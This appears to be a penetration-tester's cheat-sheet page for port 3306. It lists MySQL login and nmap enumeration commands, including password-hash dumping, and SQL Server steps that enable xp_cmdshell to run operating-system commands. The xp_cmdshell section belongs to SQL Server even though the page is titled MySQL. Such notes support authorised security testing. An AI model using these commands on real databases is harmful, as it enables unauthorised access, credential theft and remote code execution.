3306 - MYSQL

My favorite Findings:

  1. MYSQL Login: mysql -h <IP> -u <username> -p <pass> -P <port>

  2. Nmap Vulnerability scan: nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>

  3. Login: sqsh -S <IP> -U <username> -P <password> -D <database>

xp_cmdshell -> RCE

sqsh -S <IP> -U <Username> -P <Password> -D <Database>

In sqsh, you need to use GO after writing the query to send it
Do one by one each command:

# Get users that can run xp_cmdshell
Use master
EXEC sp_helprotect 'xp_cmdshell'

# Check if xp_cmdshell is enabled
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';

# This turns on advanced options and is needed to configure xp_cmdshell
sp_configure 'show advanced options', '1'
RECONFIGURE

# This enables xp_cmdshell
sp_configure 'xp_cmdshell', '1'
RECONFIGURE
EXEC master..xp_cmdshell 'whoami'
Previous5985/5986 - Evil-winrmNext1433 - MSSQL

Last updated